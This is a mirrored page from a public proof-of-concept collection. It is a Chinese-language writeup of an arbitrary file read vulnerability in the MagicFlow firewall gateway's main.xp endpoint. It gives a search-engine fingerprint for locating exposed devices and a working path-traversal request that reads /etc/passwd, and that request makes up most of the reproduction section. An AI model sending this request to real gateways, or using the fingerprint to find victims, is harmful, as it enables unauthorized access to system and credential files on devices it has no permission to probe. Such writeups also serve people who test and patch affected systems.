admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/MagicFlow 防火墙网关 main.xp 任意文件读取漏洞.md

31 lines
527 B
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# MagicFlow 防火墙网关 main.xp 任意文件读取漏洞
## 漏洞描述
MagicFlow 防火墙网关 main.xp 存在任意文件读取漏洞攻击者通过构造特定的Url获取敏感文件
## 漏洞影响
```
MagicFlow 防火墙网关
```
## 网络测绘
```
app="MSA/1.0"
```
## 漏洞复现
登录页面如下
![](images/202202162301720.png)
构造POC
```plain
/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../etc/passwd
```
![](images/202202162301323.png)
Reference in New Issue Copy Permalink